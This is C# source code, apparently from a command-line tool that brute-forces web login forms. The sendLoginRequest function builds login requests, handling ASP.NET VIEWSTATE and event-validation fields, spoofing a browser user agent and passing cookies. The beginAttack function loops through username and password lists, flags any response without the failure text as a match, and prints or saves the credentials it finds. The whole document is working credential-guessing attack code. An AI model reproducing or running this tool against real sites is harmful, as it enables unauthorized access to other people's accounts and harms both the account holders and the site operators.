/** * Send Request to the server and returns a response * However event validation is active so i have to pull that from the initial response */ public static string sendLoginRequest(string username, string password) { //If the form type is ASP then use this to grab required values if (UserInput.formType == 1) { //Gets the VIEWSTATE, EVENTVALIDATION ETC. getData(); } if (UserInput.formType != 3) { //Setup a new web request to the URL HttpWebRequest request = (HttpWebRequest)WebRequest.Create(UserInput.fullPath); request.Method = "POST"; var postData = ""; //Set the post data to include VIEWSTATE Properties if acquired if (__VIEWSTATE.Length > 0) { postData = "__VIEWSTATE=" + __VIEWSTATE + "&"; postData += "__VIEWSTATEGENERATOR=" + __VIEWSTATEGENERATOR + "&"; postData += "__EVENTVALIDATION=" + __EVENTVALIDATION + "&"; postData += HttpUtility.UrlEncode(UserInput.usernameField, Encoding.ASCII) + "=" + username + "&"; postData += HttpUtility.UrlEncode(UserInput.passwordField, Encoding.ASCII) + "=" + password; } //If not just send the user name fields else { postData = HttpUtility.UrlEncode(UserInput.usernameField, Encoding.ASCII) + "=" + username + "&"; postData += HttpUtility.UrlEncode(UserInput.passwordField, Encoding.ASCII) + "=" + password; //If we are using the general form if (UserInput.formType == 2) { postData += "&" + UserInput.customFormVariables; } } //Set general HTTP headers request.ContentLength = postData.Length; request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"; request.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"; request.ContentType = "application/x-www-form-urlencoded"; request.Host = UserInput.host; request.Referer = UserInput.fullPath; //Write the user information into the stream StreamWriter requestWriter = new StreamWriter(request.GetRequestStream()); requestWriter.Write(postData); requestWriter.Close(); //Get, read and return the response var response = request.GetResponse(); responseStr = new StreamReader(response.GetResponseStream()).ReadToEnd(); } else { UserInput.customFormVariables = UserInput.buildCustomOptions(UserInput.rawFormVariables); //Setup a new web request to the URL HttpWebRequest request = (HttpWebRequest)WebRequest.Create(UserInput.fullPath + "?" + HttpUtility.UrlEncode(UserInput.usernameField, Encoding.ASCII) + "=" + username + "&" + HttpUtility.UrlEncode(UserInput.passwordField, Encoding.ASCII) + "=" + password + "&" + UserInput.customFormVariables); //Set general HTTP headers request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"; request.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"; if (UserInput.cookies.Length > 0) { if (UserInput.cookies.Length > 0) { request.Headers.Add(HttpRequestHeader.Cookie, UserInput.cookies); } } request.ContentType = "application/x-www-form-urlencoded"; request.Host = UserInput.host; request.Referer = UserInput.fullPath; WebResponse response = request.GetResponse(); using (Stream data = response.GetResponseStream()) { StreamReader reader = new StreamReader(data); responseStr = reader.ReadToEnd(); } response.Close(); } return(responseStr); }
/** * Called to actually start attempting passwords */ public static void beginAttack() { //Load lists loadLists(); //Check if it is meant to be using a usernames and passwords list if (usernames.Count > 0) { //Foreach username foreach (string username in usernames) { //Iterate through all the possible passwords foreach (string password in passwords) { //If a match is found add it to the corresponding point in the array list that is in line with the user name if (!Requests.sendLoginRequest(username, password).Contains(UserInput.invalidPasswordText)) { foundPasswords.Add(password); passwordFound = true; break; } //If no password was found add no password found in the place instead to keep the list in line else { foundPasswords.Add("No Password Found"); } //As well, if showAttempts is set to true print out the fact that the attempt was invalid if (showAttempts == true) { Console.Write(String.Format("Username: {0} Password: {1} Status: ", username, password)); Console.ForegroundColor = ConsoleColor.Red; Console.Write("Incorrect\n"); Console.ResetColor(); } } } } //If the user selected to use a singular username else { //Only loop through each password in the list foreach (string password in passwords) { //If the correct password was found set teh correctUsername and correctPassword variables and break out of the loop if (!Requests.sendLoginRequest(username, password).Contains(UserInput.invalidPasswordText)) { passwordFound = true; correctPassword = password; correctUsername = username; break; } //Similar to above if showAttempts is true show the failed password attempt if (showAttempts == true) { Console.Write(String.Format("Username: {0} Password: {1} Status: ", username, password)); Console.ForegroundColor = ConsoleColor.Red; Console.Write("Incorrect\n"); Console.ResetColor(); } } } //After both loops are done and a password was found this block runs if (passwordFound == true) { //First it checks if we are using a singular user name if (username.Length > 0) { //If so change the text to green display "Password Found!!" and list the correct username and password Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("Password Found!!"); Console.WriteLine(String.Format("Username: {0} Password: {1}", correctUsername, correctPassword)); Console.ResetColor(); //And make the user type return if they are done if they dont then exit the program on the next key press if (UserInput.getUserResponse("If you wish to return to the menu please type \"return\":") == "return") { Console.ReadKey(); UserInput.userSetup(); } else { Console.WriteLine("Press Any Key To Exit..."); Console.ReadKey(); } } //However if the user was running a username list then display each user name and password combo, and ask if they want to write it to a file else { Console.WriteLine("The Following List Of Passwords Was Found...\n"); for (int i = 0; i < foundPasswords.Count; i++) { if (foundPasswords[i] != "No Password Found") { Console.WriteLine(String.Format("Username: {0} Password: {1}", usernames[i], foundPasswords[i])); } } //Asks the user if they want to output the password/username list to a file if (UserInput.getUserResponse("Would you like to output this list to a file? (y/n):") == "y") { //Ask where then generate a variable to then write to the file string outPath = UserInput.getUserResponse("Enter An Output Path: "); string output = ""; for (int i = 0; i < foundPasswords.Count; i++) { if (foundPasswords[i] != "No Password Found") { output += String.Format("Username: {0} Password: {1}", usernames[i], foundPasswords[i]) + "\n"; } } File.WriteAllText(outPath, output); } } } //If no passwords were found at all else { //Turn the text red and then wait for the user to press a key then exit Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("No Matches Found"); Console.ResetColor(); Console.WriteLine("Press Any Key To Exit..."); Console.ReadKey(); } }